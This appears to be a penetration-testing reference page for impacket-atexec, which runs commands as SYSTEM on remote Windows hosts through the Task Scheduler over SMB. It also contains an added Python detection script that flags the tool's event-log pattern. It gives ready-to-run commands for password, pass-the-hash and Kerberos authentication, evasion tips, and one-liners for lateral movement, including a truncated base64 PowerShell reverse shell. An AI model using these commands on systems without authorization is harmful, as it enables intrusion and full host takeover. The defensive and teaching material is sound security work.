
Overview

impacket-atexec executes a command on a remote Windows host by registering a scheduled task through the Task Scheduler RPC interface (ITaskSchedulerService), reached over the \pipe\atsvc named pipe on SMB. The task runs as SYSTEM; its output is redirected to a temp file on the target and read back over the ADMIN$ share. It requires local administrator rights on the target and is useful when other execution methods (psexec, wmiexec, smbexec) are blocked but the Task Scheduler service is still reachable.

Authentication

Method | Flag | Example
Password | domain/user:password@target | CORP/admin:Password1@<target>
NTLM hash | -hashes [LM]:NT | -hashes :<NT_HASH> (LM half may be left empty)
Kerberos | -k -no-pass | -k -no-pass -dc-ip 10.10.10.1 (target given as FQDN, TGT in KRB5CCNAME)

Basic Usage

Execute a command and get its output back (the command runs as SYSTEM, so whoami returns nt authority\system):
impacket-atexec CORP/admin:Password1@<target> "whoami"
Execute against an IP target with a local account:
impacket-atexec administrator:<password>@<target-ip> "ipconfig /all"
Multiple commands chained in one cmd.exe invocation:
impacket-atexec CORP/admin:Password1@<target> "whoami & hostname & ipconfig"

How It Works

  1. Authenticates to the target over SMB (port 445); local administrator rights on the target are required
  2. Connects to the \pipe\atsvc named pipe and binds to the Task Scheduler RPC interface (ITaskSchedulerService)
  3. Registers a scheduled task under a random eight-letter name, running as SYSTEM (S-1-5-18), and immediately triggers it with SchRpcRun
  4. The task runs cmd.exe /C <command> > %windir%\Temp\<random>.tmp 2>&1 (the file carries the same random name as the task)
  5. Polls the task's last-run information until it shows the task has run, then deletes the task
  6. Reads the output file from the ADMIN$ share (ADMIN$\Temp\<random>.tmp, i.e. C:\Windows\Temp) over SMB and deletes it
The entire flow against the target happens over SMB (port 445); no additional ports on the target are needed. With Kerberos authentication the attacking host must additionally reach the KDC on port 88 to obtain the service ticket unless one is already in the ccache. The -silentcommand flag skips the output redirect and the file read-back (steps 4 and 6), so no output is returned but no temp file is written.

OPSEC

Artifact | Details
Event 4698 | Scheduled task created (Security log)
Event 4702 | Scheduled task updated (Security log)
Event 4699 | Scheduled task deleted (Security log)
Event 106 | Task registered (Microsoft-Windows-TaskScheduler/Operational log)
Event 141 | Task removed (Microsoft-Windows-TaskScheduler/Operational log)
Temp file | Output written to C:\Windows\Temp\<random>.tmp, read and deleted seconds later
Process | cmd.exe spawned as SYSTEM by the svchost.exe instance hosting the Schedule service
The task name is eight random ASCII letters registered at the root of the task folder, with a LocalSystem principal and an Exec action of cmd.exe /C <command> > %windir%\Temp\<same name>.tmp 2>&1. That combination, followed by a 4699 for the same task within seconds of the 4698, is what detection rules commonly alert on. Two caveats for defenders: 4698/4699/4702 are only written when the "Audit Other Object Access Events" subcategory is enabled, and the Task Scheduler Operational log is disabled by default on recent Windows builds and must be turned on explicitly. From the operator side, -silentcommand removes the temp-file artifact at the cost of getting no output back; the task creation and deletion events remain.
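The detection logic above, run over constructed log records, as an added example (not code from the original page or from impacket). It assumes event records shaped after the EventData of Security log Event IDs 4698 and 4699 (EventID, timestamp, TaskName, TaskContent XML), and the 60-second create/delete window and three-reason threshold are assumptions chosen for illustration.

```python
"""Heuristic detection of impacket-atexec style scheduled-task activity.

Added example; not code from the original page or from impacket.
Input: constructed records shaped after the EventData of Event ID 4698
(task created) and 4699 (task deleted). The rule encodes the artifacts
described above: an eight-letter task name at the root folder, a cmd.exe /C
action redirecting output to %windir%\\Temp\\<name>.tmp, a LocalSystem
principal, and a create/delete pair only seconds apart.
"""
import re
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Eight random ASCII letters directly under the root task folder.
RANDOM_NAME_RE = re.compile(r"^\\[A-Za-z]{8}$")
# The redirect appended to the command (see "How It Works", step 4).
REDIRECT_RE = re.compile(r">\s*%windir%\\Temp\\[A-Za-z]{8}\.tmp\s+2>&1\s*$", re.IGNORECASE)


def parse_task_content(task_xml):
    """Return (principal UserId, Exec Command, Exec Arguments) from task XML."""
    root = ET.fromstring(task_xml)
    user = root.findtext(f".//{TASK_NS}Principal/{TASK_NS}UserId") or ""
    command = root.findtext(f".//{TASK_NS}Exec/{TASK_NS}Command") or ""
    arguments = root.findtext(f".//{TASK_NS}Exec/{TASK_NS}Arguments") or ""
    return user, command, arguments


def score_creation(event):
    """Reasons a 4698 record looks like atexec; an empty list means nothing suspicious."""
    reasons = []
    if RANDOM_NAME_RE.match(event["TaskName"]):
        reasons.append("random eight-letter task name at root folder")
    user, command, arguments = parse_task_content(event["TaskContent"])
    if user.upper() == "S-1-5-18":
        reasons.append("runs as LocalSystem")
    if command.lower().endswith("cmd.exe") and REDIRECT_RE.search(arguments):
        reasons.append("cmd.exe /C with output redirected to %windir%\\Temp\\<name>.tmp")
    return reasons


def find_atexec_activity(events, max_gap=timedelta(seconds=60), min_reasons=3):
    """Correlate 4698/4699 pairs by TaskName; return [(TaskName, reasons)] alerts."""
    alerts = []
    created = {e["TaskName"]: e for e in events if e["EventID"] == 4698}
    for deletion in events:
        if deletion["EventID"] != 4699 or deletion["TaskName"] not in created:
            continue
        creation = created[deletion["TaskName"]]
        reasons = score_creation(creation)
        gap = deletion["Time"] - creation["Time"]
        if timedelta(0) <= gap <= max_gap:
            reasons.append("created and deleted within %d seconds" % gap.total_seconds())
        if len(reasons) >= min_reasons:
            alerts.append((deletion["TaskName"], reasons))
    return alerts


# Constructed sample records (not real telemetry). The first task XML mirrors the
# shape described in "How It Works": LocalSystem principal, cmd.exe /C ... redirect.
ATEXEC_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="LocalSystem"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="LocalSystem"><Exec><Command>cmd.exe</Command>
    <Arguments>/C whoami &gt; %windir%\\Temp\\kQzPwXyA.tmp 2&gt;&amp;1</Arguments></Exec></Actions>
</Task>"""

BACKUP_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="Author"><UserId>CORP\\svc_backup</UserId><LogonType>Password</LogonType></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\\Scripts\\nightly-backup.cmd</Command></Exec></Actions>
</Task>"""

T0 = datetime(2024, 3, 1, 10, 0, 0)
SAMPLE_EVENTS = [
    {"EventID": 4698, "Time": T0, "TaskName": "\\kQzPwXyA", "TaskContent": ATEXEC_TASK_XML},
    {"EventID": 4699, "Time": T0 + timedelta(seconds=4), "TaskName": "\\kQzPwXyA", "TaskContent": ATEXEC_TASK_XML},
    {"EventID": 4698, "Time": T0 + timedelta(minutes=5), "TaskName": "\\Backup\\Nightly", "TaskContent": BACKUP_TASK_XML},
    {"EventID": 4699, "Time": T0 + timedelta(days=30), "TaskName": "\\Backup\\Nightly", "TaskContent": BACKUP_TASK_XML},
]

if __name__ == "__main__":
    for name, reasons in find_atexec_activity(SAMPLE_EVENTS):
        print(f"ALERT {name}: " + "; ".join(reasons))
```

The scheduled backup task is deliberately left alone: it has a folder path, a named principal and no redirect, so it collects no reasons even though it is eventually deleted. In a real pipeline the same scoring runs on the TaskContent field of each 4698 as it arrives, and the create/delete correlation is the part that most sharply separates atexec from ordinary administration.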

Pass-the-Hash

impacket-atexec -hashes :<NT_HASH> <user>@<target> "whoami"
Full LM:NT format (the LM half can be left empty on any modern domain):
impacket-atexec -hashes <LM_HASH>:<NT_HASH> <user>@<target> "whoami"
The value aad3b435b51404eeaad3b435b51404ee that appears in many examples is the LM hash of an empty password; it belongs in the LM position (or is simply omitted), and using it as the NT hash will not authenticate.

Kerberos Authentication

Requires a valid TGT (or a usable service ticket) in the ccache file that the KRB5CCNAME environment variable points to; -no-pass tells the tool not to prompt for a password.
export KRB5CCNAME=/tmp/admin.ccache
impacket-atexec -k -no-pass CORP/admin@<target-fqdn> "whoami"
With an explicit DC IP (needed when the KDC is not resolvable through your DNS):
impacket-atexec -k -no-pass -dc-ip 10.10.10.1 CORP/admin@<target-fqdn> "whoami"
The target must be specified by hostname (FQDN) when using Kerberos, not by IP, because the service ticket is requested for the host's SPN. If the name does not resolve from the attacking machine, keep the FQDN in the target string and add -target-ip <ip> for the actual connection.

When to Use atexec

Scenario | Why atexec
PsExec blocked | Target blocks service creation but Task Scheduler is reachable
WMI blocked | Firewall blocks WMI (DCOM) port 135 and the dynamic range 49152+
SMBExec detected | EDR flags smbexec's service creation pattern
Need single command | Quick one-off command execution without a shell
Lateral movement | Alternative pivot method when standard tools fail
atexec is a single-command execution tool, not an interactive shell, and it executes as SYSTEM by default. For interactive access, use psexec, wmiexec or smbexec.

Quick Reference

# Password auth
impacket-atexec CORP/admin:Password1@<target> "whoami"

# Pass-the-hash (NT hash only; LM half left empty)
impacket-atexec -hashes :<NT_HASH> <user>@<target> "whoami"

# Kerberos (target by FQDN)
export KRB5CCNAME=/tmp/admin.ccache
impacket-atexec -k -no-pass CORP/admin@<target-fqdn> "whoami"

# Run net commands
impacket-atexec CORP/admin:Password1@<target> "net user /domain"

# Read a file
impacket-atexec CORP/admin:Password1@<target> "type C:\Users\admin\Desktop\flag.txt"

# Reverse shell (PowerShell, base64-encoded command)
impacket-atexec CORP/admin:Password1@<target> "powershell -e JABjAGwA..."

# Fire-and-forget, no output file written on the target
impacket-atexec -silentcommand CORP/admin:Password1@<target> "powershell -e JABjAGwA..."